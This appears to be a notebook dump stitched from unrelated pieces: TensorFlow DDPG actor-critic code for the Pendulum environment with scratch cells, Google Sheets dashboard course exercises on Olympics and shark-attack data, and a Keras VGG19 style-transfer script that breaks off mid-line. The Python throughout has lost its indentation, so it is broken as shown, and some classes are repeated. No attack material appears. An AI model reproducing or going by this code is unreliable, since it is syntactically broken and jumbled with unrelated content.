net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is
# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab
class OrnsteinUhlenbeckActionNoise:
def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):
self.theta = theta
self.mu = mu
self.sigma = sigma
self.dt = dt
self.x0 = x0
self.reset()
def __call__(self):
x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \
self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)
self.x_prev = x
return x
def reset(self):
self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)
def __repr__(self):
return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)
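# Aside (our addition, not part of the original script): with sigma = 0 the OU
# update above reduces to x <- x + theta*(mu - x)*dt, which relaxes
# geometrically toward mu; a quick way to sanity-check the discretization.
_x, _mu, _theta, _dt = 0.0, 1.0, 0.15, 1e-2
for _ in range(10000):
    _x = _x + _theta * (_mu - _x) * _dt
print('noiseless OU long-run value (should be ~mu):', _x)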
# ===========================
# Tensorflow Summary Ops
# ===========================
def build_summaries():
episode_reward = tf.Variable(0.)
tf.summary.scalar("Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.summary.scalar("Qmax Value", episode_ave_max_q)
summary_vars = [episode_reward, episode_ave_max_q]
summary_ops = tf.summary.merge_all()
return summary_ops, summary_vars
# ===========================
# Agent Training
# ===========================
def train(sess, env, args, actor, critic, actor_noise):
# Set up summary Ops
summary_ops, summary_vars = build_summaries()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)
# Initialize target network weights
actor.update_target_network()
critic.update_target_network()
# Initialize replay memory
replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))
# Needed to enable BatchNorm.
# This hurts the performance on Pendulum but could be useful
# in other environments.
# tflearn.is_training(True)
for i in range(int(args['max_episodes'])):
s = env.reset()
ep_reward = 0
ep_ave_max_q = 0
for j in range(int(args['max_episode_len'])):
if args['render_env']:
env.render()
# Added exploration noise
#a = actor.predict(np.reshape(s, (1, 3))) + (1. / (1. + i))
a = actor.predict(np.reshape(s, (1, actor.s_dim))) + actor_noise()
s2, r, terminal, info = env.step(a[0])
replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,
terminal, np.reshape(s2, (actor.s_dim,)))
# Keep adding experience to the memory until
# there are at least minibatch size samples
if replay_buffer.size() > int(args['minibatch_size']):
s_batch, a_batch, r_batch, t_batch, s2_batch = \
replay_buffer.sample_batch(int(args['minibatch_size']))
# Calculate targets
target_q = critic.predict_target(
s2_batch, actor.predict_target(s2_batch))
y_i = []
for k in range(int(args['minibatch_size'])):
if t_batch[k]:
y_i.append(r_batch[k])
else:
y_i.append(r_batch[k] + critic.gamma * target_q[k])
# Update the critic given the targets
predicted_q_value, _ = critic.train(
s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))
ep_ave_max_q += np.amax(predicted_q_value)
# Update the actor policy using the sampled gradient
a_outs = actor.predict(s_batch)
grads = critic.action_gradients(s_batch, a_outs)
actor.train(s_batch, grads[0])
# Update target networks
actor.update_target_network()
critic.update_target_network()
s = s2
ep_reward += r
if terminal:
summary_str = sess.run(summary_ops, feed_dict={
summary_vars[0]: ep_reward,
summary_vars[1]: ep_ave_max_q / float(j)
})
writer.add_summary(summary_str, i)
writer.flush()
print('| Reward: {:d} | Episode: {:d} | Qmax: {:.4f}'.format(int(ep_reward), \
i, (ep_ave_max_q / float(j))))
break
def main(args):
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
critic = CriticNetwork(sess, state_dim, action_dim,
float(args['critic_lr']), float(args['tau']),
float(args['gamma']),
actor.get_num_trainable_vars())
actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
if args['use_gym_monitor']:
if not args['render_env']:
env = wrappers.Monitor(
env, args['monitor_dir'], video_callable=False, force=True)
else:
env = wrappers.Monitor(env, args['monitor_dir'], force=True)
train(sess, env, args, actor, critic, actor_noise)
if args['use_gym_monitor']:
env.monitor.close()
def start():
# if __name__ == '__main__':
parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# agent parameters
parser.add_argument('--actor-lr', help='actor network learning rate', default=0.0001)
parser.add_argument('--critic-lr', help='critic network learning rate', default=0.001)
parser.add_argument('--gamma', help='discount factor for critic updates', default=0.99)
parser.add_argument('--tau', help='soft target update parameter', default=0.001)
parser.add_argument('--buffer-size', help='max size of the replay buffer', default=1000000)
parser.add_argument('--minibatch-size', help='size of minibatch for minibatch-SGD', default=64)
# run parameters
parser.add_argument('--env', help='choose the gym env- tested on {Pendulum-v0}', default='Pendulum-v0')
parser.add_argument('--random-seed', help='random seed for repeatability', default=1234)
parser.add_argument('--max-episodes', help='max num of episodes to do while training', default=50000)
parser.add_argument('--max-episode-len', help='max length of 1 episode', default=1000)
parser.add_argument('--render-env', help='render the gym env', action='store_true')
parser.add_argument('--use-gym-monitor', help='record gym results', action='store_true')
parser.add_argument('--monitor-dir', help='directory for storing gym results', default='./results/gym_ddpg')
parser.add_argument('--summary-dir', help='directory for storing tensorboard info', default='./results/tf_ddpg')
parser.set_defaults(render_env=True)
parser.set_defaults(use_gym_monitor=True)
args = vars(parser.parse_args())
pp.pprint(args)
main(args)
%run ddpg.py --max-episodes 1000
s_dim = 10
a_dim = 4
inputs = tflearn.input_data(shape=[None, s_dim])
action = tflearn.input_data(shape=[None, a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
reluout = net
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
actout = net
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
# print(inputs,action)
print("t1",t1)
print("t1.W",t1.W)
print("reluout",reluout)
print("actout",actout)
matout = tf.matmul(reluout, t1.W)
print("matout",matout)
print("w_init",w_init)
print("out",out)
a = tf.constant(0.)
b = 2 * a
g = tf.gradients(a + b, [a, b] )
g[0]  # symbolic gradient of (a + b) w.r.t. a; since b = 2*a it evaluates to 3.0
batch_size = 10
lx = lambda x: tf.div(x, batch_size)
lx(10)  # builds a tf.div Tensor; with batch_size = 10 it evaluates to 1
import argparse
parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# agent parameters
parser.add_argument('--actor-lr', help='actor network learning rate', default=0.0001)
parser.add_argument('--critic-lr', help='critic network learning rate', default=0.001)
parser.add_argument('--gamma', help='discount factor for critic updates', default=0.99)
parser.add_argument('--tau', help='soft target update parameter', default=0.001)
parser.add_argument('--buffer-size', help='max size of the replay buffer', default=1000000)
parser.add_argument('--minibatch-size', help='size of minibatch for minibatch-SGD', default=64)
# run parameters
parser.add_argument('--env', help='choose the gym env- tested on {Pendulum-v0}', default='Pendulum-v0')
parser.add_argument('--random-seed', help='random seed for repeatability', default=1234)
parser.add_argument('--max-episodes', help='max num of episodes to do while training', default=50000)
parser.add_argument('--max-episode-len', help='max length of 1 episode', default=1000)
parser.add_argument('--render-env', help='render the gym env', action='store_true')
parser.add_argument('--use-gym-monitor', help='record gym results', action='store_true')
parser.add_argument('--monitor-dir', help='directory for storing gym results', default='./results/gym_ddpg')
parser.add_argument('--summary-dir', help='directory for storing tensorboard info', default='./results/tf_ddpg')
parser.set_defaults(render_env=False)
parser.set_defaults(use_gym_monitor=True)
args = vars(parser.parse_args())
# args here is a plain dict of DDPG settings (it has no 'accumulate' or 'integers' keys), so just print it
print(args)
# pp.pprint(args)
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args()
print (args.accumulate(args.integers))
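# Aside (illustrative only): the same accumulator pattern with an explicit argv
# list, so the cell runs without real command-line arguments. nargs='+' collects
# the positionals into a list, and store_const swaps the reducing function.
demo_parser = argparse.ArgumentParser()
demo_parser.add_argument('integers', type=int, nargs='+')
demo_parser.add_argument('--sum', dest='accumulate', action='store_const',
                         const=sum, default=max)
demo = demo_parser.parse_args(['1', '2', '4', '--sum'])
print(demo.accumulate(demo.integers))  # prints 7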
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
with tf.Session() as sess:
env = gym.make('Pendulum-v0')
np.random.seed(int('1234'))
tf.set_random_seed(int('1234'))
env.seed(int('1234'))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
print("state_dim {} action_dim {} action_bound {}".format(state_dim,action_dim,action_bound))
print("action_bound type {}".format(type(action_bound)))
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
# actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
# float(args['actor_lr']), float(args['tau']),
# int(args['minibatch_size']))
# critic = CriticNetwork(sess, state_dim, action_dim,
# float(args['critic_lr']), float(args['tau']),
# float(args['gamma']),
# actor.get_num_trainable_vars())
# actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
# if args['use_gym_monitor']:
# if not args['render_env']:
# env = wrappers.Monitor(
# env, args['monitor_dir'], video_callable=False, force=True)
# else:
# env = wrappers.Monitor(env, args['monitor_dir'], force=True)
# train(sess, env, args, actor, critic, actor_noise)
# if args['use_gym_monitor']:
# env.monitor.close()
import numpy as np
testaction=np.array([2.])
testaction
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
args = {}
args['env'] = "Pendulum-v0"
args['random_seed'] = 1234
args['actor_lr'] = 0.0001
args['critic_lr'] = 0.001  # underscore, not hyphen, so the key matches args['critic_lr'] used when building CriticNetwork
args['tau'] = 0.001
args['minibatch_size'] = 64
args
tf.reset_default_graph()
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
print("state_dim {} action_dim {} action_bound {}".format(state_dim,action_dim,action_bound))
actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
print("actor.network_params length {}".format(len(actor.network_params)))
# print("actor.network_params {}".format(actor.network_params))
print("actor.target_network_params length {}".format(len(actor.target_network_params)))
print("actor.update_target_network_params length {}".format(len(actor.update_target_network_params)))
print("actor action_gradient {}".format(actor.action_gradient))
print("actor unnormalized_actor_gradients {}".format(actor.unnormalized_actor_gradients))
print("actor.scaled_out {}".format(actor.scaled_out))
print("actor.action_gradient {}".format(actor.action_gradient))
print("actor.network_params length {}".format(len(actor.network_params)))
print("actor.network_params {}".format(actor.network_params))
print("actor.actor_gradients {}".format(actor.actor_gradients))
```
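The `update_target_network_params` op inspected above implements the DDPG soft target update, θ_target ← τ·θ_online + (1 − τ)·θ_target. A standalone NumPy sketch (illustrative only; the variable names are ours, not the script's) shows how slowly the target tracks the online weights at the default τ = 0.001:

```python
import numpy as np

tau = 0.001                 # matches the --tau default above
online = np.ones(4)         # stand-in for one online-network parameter tensor
target = np.zeros(4)        # target network starts elsewhere

for step in range(1000):
    # theta_target <- tau * theta_online + (1 - tau) * theta_target
    target = tau * online + (1.0 - tau) * target

# after 1000 updates the target has closed only ~63% of the gap
print(target[0])
```

This exponential averaging keeps the critic's bootstrapped targets slowly moving, which is what stabilizes training.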
## Course Description
A picture can tell a thousand words - but only if you use the right picture! This course teaches you the fundamentals of data visualization with Google Sheets. You'll learn how to create common chart types like bar charts, histograms, and scatter charts, as well as more advanced types, such as sparkline and candlestick charts. You will look at how to prepare your data and use Data Validation and VLookup formulas to target specific data to chart. You'll learn how to use Conditional Formatting to apply a format to a cell or a range of cells based on certain criteria, and finally, how to create a dashboard showing plots and data together. Along the way, you'll use data from the Olympics, shark attacks, and Marine Technology from the ASX.
### Business Intelligence and Using Dashboards
Learn about business intelligence and dashboards for analyzing information in today's data-driven world. Create a basic dashboard and master setting up your data to get the most out of it.
### Using data validation controls to pick from a list
In the dashboard example, you are going to pick sequential numbers from a list to show countries' medal rankings.
INSTRUCTIONS
Change the rank using the drop-down menu, so that the ranks are displayed in order for countries 1 through 5.
See chapter1_1
### Using conditional formatting on a dashboard
Conditional formatting is another feature that completed dashboards can contain, allowing users to modify the visual display of the dashboard. Here, you will explore the conditional formatting on the same dashboard for the 2016 Olympic Games in Brazil.
INSTRUCTIONS
Highlight Gold, Silver, and Bronze figures and change the Conditional Formatting rule to Greater than or equal to number to 25.
HINT
The Gold, Silver, and Bronze figures are in F3:H12.
Conditional formatting is found by selecting Format then Conditional formatting.
### Creating a column chart from your data
In the dataset you'll find the medal statistics by country from the 2016 Olympic Games held in Brazil in order of ranking. Let's use the data to create a column chart to show the medal tallies of the first 3 ranked countries.
INSTRUCTIONS
Highlight Gold, Silver, and Bronze medal stats for the first three ranked countries, create a column chart and move it to the right of the data.
See chapter1_2
You need to select both the data and the country names to the left. You may need to edit the chart type, as the default might not be a column chart.
### Setting up your worksheet with formulas of reference
In this next task, you will showcase only the data you want to chart using formulas of reference to extract the top 3 countries medal tallies from the dataset and show them in the Dashboard.
INSTRUCTIONS
Create a formula of reference in cell A1 that shows the contents of A1 in the dataset.
Copy the calculation down and across the sheet to show all data for the first 3 ranked countries.
Make sure column B is wide enough to see the entire country name.
See chapter1_3
=Olympics!A1 Write this in Sheet1, then drag it both vertically and horizontally. Note that Olympics is the name of another sheet.
### Charting the medal statistics
Now that you have only the data you want to chart in this task you will create a column chart and display it underneath your extracted data.
INSTRUCTIONS
Create a column chart showing the country, Gold, Silver, and Bronze stats.
Position the chart underneath the data.
Just plot the data selected in the previous exercise.
### Getting started
Setting up your data in the correct way in the beginning will save you lots of time and effort later on. Here, you will set up your data so you have an efficient spreadsheet to work with as you create your dashboard.
INSTRUCTIONS
Remove all rows from the dataset that are empty.
You can select multiple rows at once by holding down the Ctrl or command key.
### Format dates and numbers
To make your data clear at a glance, in this task you will apply a little bit of formatting to your data.
INSTRUCTIONS
Format the date so that it shows the day, month in full and year and widen the column so you can see it all.
Ensure all numbers have 2 decimal places.
HINT
To format the date go to Format then Number. Then choose ....
To increase decimals, use the toolbar icon. Select all the data values, then click the relevant icon in the toolbar.
## Efficient Column Charts
Create and format a column chart to showcase data and learn a few smart tricks along the way. Look at using named ranges to refer to cells in your worksheet, making them user-friendly and easy to work with.
### Creating a column chart for your dashboard
In this chapter, you will start to put together your own dashboard.
Your first step is to create a basic column chart showing fatalities, injured, and uninjured statistics for the states of Australia over the last 100 years.
INSTRUCTIONS
In A1 use a formula that refers to the heading on your dataset.
Select the State column and the Fatal, Injured, and Uninjured statistics, and create a chart.
Change the chart to a column chart.
See chapter1_4
Use the following to refer to the 'Shark Attacks' sheet and the range A1:E1. Note the ! sign.
='Shark Attacks'!A1:E1
### Format chart, axis titles and series
Your next task is to apply some basic formatting to the same chart to jazz it up and make it more pleasing to the reader's eye.
INSTRUCTIONS
Alter the title of your chart to Fatal, Injured and Uninjured Statistics, make the color black, and bold it.
Change the series colors to Fatal - red, Injured - blue, Uninjured - green.
In the chart editor, go to Customize, select the drop-down arrow next to All series, and select each series in turn to change its color.
### Removing a series
Taking things a little further, in the next task you will manipulate the look of your chart a bit more and remove the Uninjured statistical data.
INSTRUCTIONS
Remove the Uninjured series from your chart.
HINT
On the setup tab, click the 3 dots to the right of the series you wish to remove to see this option.
See chapter1_5
### Changing the plotted range
It's just as easy to change a range as it is to delete it. For this task, have a go at changing the range of your chart so it now only showcases the top 3 states' Fatal statistics.
INSTRUCTIONS
Change the range of your chart so you are plotting only the fatalities from the 3 states with the highest numbers, and change the chart title to Top 3 States Number of Fatalities.
Don't forget you can select the range to be charted, or you can type it out.
### Using named ranges
In this task you are going find an existing range and insert a blank row within the range.
INSTRUCTIONS
- Select Data in the menu, then Named ranges, and click on the SharkStats named range to see the highlighted range.
Insert a blank row after row 1.
Did you notice that even though you inserted the blank row, your named range didn't change? We have just looked at the basic named range in this course, but there are many other types you can use with your data. Remember that named ranges cannot contain spaces; however, you can use an underscore to separate words.
### Summing using a Named range
In this task you will remove a blank row and use a Named range in a formula.
INSTRUCTIONS
Remove the blank row you inserted in the last exercise.
In B10 use the named range Total in lieu of cell references to sum the totals in C10:E10.
Remember that if you create a named range in a sheet, it will still be viewable and usable in the Named range menu on any sheet within your workbook.
=sum(Total), where Total is just a name for the range C10:E10.
### Averaging using a Named range
In this task you will use a named range within a formula to find an average.
INSTRUCTIONS
In C11 use the named range Fatalities in lieu of cell references to average the number of Fatalities.
=average(Fatalities)
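Outside of Sheets, the named-range idea, giving a block of cells a name and then aggregating over it, can be mimicked in a few lines of Python (a loose analogy of our own; the numbers below are made up, not from the course data):

```python
# a "sheet" modeled as a dict mapping range names to their values
named_ranges = {
    "Fatalities": [10.0, 7.0, 4.0, 2.0],  # hypothetical per-state counts
    "Total": [23.0, 15.0, 9.0],
}

# rough equivalents of =average(Fatalities) and =sum(Total)
avg_fatalities = sum(named_ranges["Fatalities"]) / len(named_ranges["Fatalities"])
grand_total = sum(named_ranges["Total"])
print(avg_fatalities, grand_total)  # 5.75 47.0
```

The benefit is the same as in Sheets: formulas read as intent ("average the fatalities") rather than as opaque cell coordinates.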
## Dashboard Controls
A dashboard is like a control panel. Look at ways to allow a user to use this control panel to get different results from your dashboard.
### Setting up your data
In this task, you are going to use data from the ASX for a company that sells shark repellent systems and prepare it for charting. The first step is to tidy up and format the data.
INSTRUCTIONS
Remove the blank row and standardize your decimal places.
Ensure the current date has the same format as the dates in the column.
See chapter1_6
### Format numbers within your dataset
In your next task you will edit the numbers in your dataset so that they are all formatted the same way.
INSTRUCTIONS
Format the numbers in the Volume column so that they all include commas to label thousands.
also See chapter1_6
### Creating and testing the data validation
With your data optimized and your named ranges set up, in this task you will set up a data validation to allow a user to select a date from a list.
INSTRUCTIONS
Enter the heading SM8 Smart Marine Systems ASX in A15.
Starting in A16, enter the column headings Date, Open, High, Low and Close.
Create a data validation using the named range Dates in A17:A26. **Click Data -> Data validation -> cell range is A17:A26 -> for the list range, choose the named range 'Dates'**
Ensure the following text is available for those who need help: Select a date from the list to see Opening and Closing prices.
```
# Define initial variables
from keras.preprocessing.image import load_img, img_to_array
target_image_path = '/home/fc/Downloads/fengjing.jpg'
style_reference_image_path = '/home/fc/Downloads/fangao_xinkong.jpg'
width, height = load_img(target_image_path).size
img_height = 400
img_width = int(width * img_height / height)
# Helper functions
import numpy as np
from keras.applications import vgg19
def preprocess_image(image_path):
img = load_img(image_path, target_size=(img_height, img_width))
img = img_to_array(img)
img = np.expand_dims(img, axis=0)
img = vgg19.preprocess_input(img)
return img
def deprocess_image(x):
x[:, :, 0] += 103.939
x[:, :, 1] += 116.779
x[:, :, 2] += 123.68
x = x[:, :, ::-1]
x = np.clip(x, 0, 255).astype('uint8')
return x
# Load the pretrained VGG19 network and apply it to the three images
from keras import backend as K
target_image = K.constant(preprocess_image(target_image_path))
style_reference_image = K.constant(preprocess_image(style_reference_image_path))
combination_image = K.placeholder((1, img_height, img_width, 3))
input_tensor = K.concatenate([target_image,
style_reference_image,
combination_image], axis=0)
model = vgg19.VGG19(input_tensor=input_tensor,
weights='imagenet',
include_top=False)
print('Model loaded.')
# Content loss
def content_loss(base, combination):
return K.sum(K.square(combination - base))
# Style loss
def gram_matrix(x):
features = K.batch_flatten(K.permute_dimensions(x, (2, 0, 1)))
gram = K.dot(features, K.transpose(features))
return gram
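# Aside (plain NumPy, our addition): the Gram matrix is F.F^T over flattened
# feature maps, so it is always symmetric and its diagonal holds each
# channel's squared norm; off-diagonals measure correlation between channels.
_feats = np.array([[1., 2., 3.],    # 2 "channels" with 3 "pixels" each
                   [0., 1., 0.]])
_gram_demo = _feats.dot(_feats.T)
print(_gram_demo)                   # [[14.  2.] [ 2.  1.]]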
def style_loss(style, combination):
S = gram_matrix(style)
C = gram_matrix(combination)
channels = 3
size = img_height * img_width
return K.sum(K.square(S - C)) / (4. * (channels ** 2) * (size ** 2))
# Total variation loss
def total_variation_loss(x):
a = K.square(
